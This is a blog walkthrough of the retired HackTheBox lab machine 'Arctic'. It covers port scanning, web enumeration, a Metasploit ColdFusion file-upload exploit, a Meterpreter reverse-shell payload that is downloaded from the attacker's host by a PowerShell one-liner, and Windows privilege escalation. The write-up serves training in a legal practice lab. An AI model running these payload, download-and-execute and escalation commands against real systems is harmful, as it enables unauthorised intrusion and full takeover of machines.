HackTheBox Arctic - with Metasploit

Ari Kalfus | May 23, 2020 min read

This series will follow my exercises in HackTheBox. All published writeups are for retired HTB machines. Whether or not I use Metasploit to pwn the server will be indicated in the title.

Arctic

Difficulty: Easy

Machine IP: 10.10.10.11

I run a quick port scan to identify the open ports:

nmap -p- --min-rate=1000 -T4 -Pn 10.10.10.11

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-28 22:21 EDT
Nmap scan report for 10.10.10.11
Host is up (0.018s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
8500/tcp  open  fmtp
49154/tcp open  unknown

I then interrogate the three open ports:

nmap -A -sC -sV -Pn -p135,8500,49154 10.10.10.11

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-28 22:23 EDT
Nmap scan report for 10.10.10.11
Host is up (0.013s latency).

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

THe 8500 port defies identification. Navigating to it in my browser, I see it is a web server.

I bust out gobuster. It times out trying to query the server. By manually navigating to a few test paths and counting seconds, I see the issue. The server waits 25 seconds before responding to any web request.

I extend gobuster’s HTTP timeout to 35 seconds with the flag --timeout 35.

It takes a while for the brute force to run, but I eventually make my way to this page:

http://10.10.10.11:8500/CFIDE/administrator/enter.cfm

Where I find a Coldfusion web server.

Searching for vulnerabilities on exploit-db with searchsploit coldfusion, I find the following:

Adobe ColdFusion 2018 - Arbitrary File Upload | exploits/multiple/webapps/45979.txt

Ah, and it has a matching Metasploit module: exploit/windows/http/coldfusion_fckeditor.

This module will not work out of the box, however, as its default timeout is 5 seconds.

The module file is located at /usr/share/metasploit-framework/modules/exploits/windows/http/coldfusion_fckeditor.rb.

You want to find the send_request_cgi and send_request_raw methods and change the 5 at the end of their function declarations to 30, to increase their timeouts from 5 seconds to 30 seconds.

Modifying Metasploit module source code to extend timeout to 30 seconds

From there, you can execute this exploit to obtain a user shell and the accompanying user flag.

Let’s take this user shell and upgrade it to a Meterpreter shell so that we can run Metasploit’s local privilege suggester for privilege escalation options.

We create a payload with msfvenom and start a local web server:

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.29 lport=4645 -f exe > shell.exe
sudo python3 -m http.server

Then, in our user shell on the target, we can execute this powershell one-liner to download the file:

powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.29:8000/shell.exe', 'fun.exe')"

From there we start a Meterpreter handler on port 4645 and run the fun.exe executable on the target. Our meterpreter user shell connects.

Now run run post/multi/recon/local_exploit_suggester:

msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.11 - Collecting local exploits for x64/windows...
[*] 10.10.10.11 - 15 exploit checks are being tried...
[+] 10.10.10.11 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[*] Post module execution completed

Our user is not in the Administrators group so we cannot use the first two exploits.

The third exploit, exploit/windows/local/ms10_092_schelevator, is successful and we get a root shell. From here we can grab our root flag.

comments powered by Disqus